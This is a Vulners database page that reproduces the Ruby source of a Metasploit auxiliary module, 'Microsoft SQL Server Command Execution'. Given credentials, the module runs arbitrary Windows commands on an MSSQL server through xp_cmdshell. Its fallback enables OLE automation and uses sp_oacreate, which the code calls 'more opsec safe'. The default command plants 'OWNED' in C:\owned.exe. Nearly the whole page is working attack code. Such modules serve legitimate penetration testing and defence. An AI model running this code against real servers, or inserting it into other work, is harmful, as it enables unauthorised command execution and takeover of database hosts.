Vulners
Lucene search
Microsoft SQL Server Command Execution
🗓️ 12 Jan 2009 05:18:05Reported by tebo <[email protected]>, arcc <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 34 Views
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::OptionalSession::MSSQL
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft SQL Server Command Execution',
'Description' => %q{
This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the
sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is
required to use this module.
},
'Author' =>
[
'tebo <tebo[at]attackresearch.com>',
'arcc <pw[at]evait.de>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
[ 'URL', 'https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql'],
],
)
)
register_options([
OptString.new('CMD', [ false, 'Command to execute', 'cmd.exe /c echo OWNED > C:\\owned.exe']),
OptEnum.new('TECHNIQUE', [true, 'Technique to use for command execution', 'xp_cmdshell', ['xp_cmdshell', 'sp_oacreate']])
])
end
def run
if session
set_mssql_session(session.client)
else
unless mssql_login_datastore
print_error("Error with mssql_login call")
info = self.mssql_client.initial_connection_info
if info[:errors] && !info[:errors].empty?
info[:errors].each do |err|
print_error(err)
end
end
return
end
end
technique = datastore['TECHNIQUE']
case technique
when 'xp_cmdshell'
begin
mssql_xpcmdshell(datastore['CMD'], true)
rescue RuntimeError
print_status('Error while running "xp_cmdshell" method...retrying with "sp_oacreate" method')
mssql_spoacreate
end
when 'sp_oacreate'
mssql_spoacreate
end
end
def mssql_spoacreate
doprint = datastore['VERBOSE']
print_status('Enabling advanced options and ole automation procedures.')
mssql_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;", doprint)
mssql_query("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", doprint)
print_good('Executing command using sp_oacreate. No output will be displayed.')
mssql_query("DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, '#{datastore['CMD']}';", doprint)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Apr 2024 19:06Current
7.7High risk
Vulners AI Score7.7